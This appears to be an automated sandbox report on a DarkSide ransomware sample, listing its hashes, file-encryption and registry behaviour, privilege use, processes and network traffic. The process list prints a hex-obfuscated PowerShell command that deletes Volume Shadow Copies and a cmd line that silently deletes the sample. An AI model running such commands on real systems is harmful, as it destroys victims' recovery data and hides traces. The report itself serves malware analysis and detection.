MD5 844b086621dd446aca3ac2496a98ec69
SHA1 8cae203ad457a7612b85293871318a3751ad9665
SHA256 44d1548152350f856b67d425e286439575a3cbcd111f8367cb07fe0ea1a9230f
SHA512 8a10a403ff0ef60e6c27b1f7acfde545764d0099a75041bb4648b4030eeeca687ca355bbb98fd91b141ef56111f1b304cdb37746943517106d1130e412148ec1

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-10 11:47

Reported

2022-02-10 11:50

Platform

win10v2004-en-20220112

Max time kernel

144s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

Signatures

DarkSide

ransomware darkside

suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

suricata

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CompressGet.png => C:\Users\Admin\Pictures\CompressGet.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ImportRemove.png => C:\Users\Admin\Pictures\ImportRemove.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ImportRemove.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResizeUnregister.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeEnter.tif => C:\Users\Admin\Pictures\ResumeEnter.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\UnblockCheckpoint.crw => C:\Users\Admin\Pictures\UnblockCheckpoint.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnblockCheckpoint.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompressGet.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResizeUnregister.tif => C:\Users\Admin\Pictures\ResizeUnregister.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeAssert.png => C:\Users\Admin\Pictures\ResumeAssert.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeAssert.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeEnter.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b787986.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b787986.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\MusNotifyIcon.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\MusNotifyIcon.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132891437153417678" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4164" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.240578" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3932" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" C:\Windows\System32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b787986.ico" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7b787986\ = "7b787986" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986\DefaultIcon C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\MusNotifyIcon.exe

%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\43E615~1.EXE >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 settings-win.data.microsoft.com udp
NL 51.124.78.146:443 settings-win.data.microsoft.com tcp
NL 104.110.191.140:80 tcp
NL 51.124.78.146:443 settings-win.data.microsoft.com tcp
NL 51.124.78.146:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 geo.prod.do.dsp.mp.microsoft.com udp
US 52.184.216.226:443 geo.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 kv801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
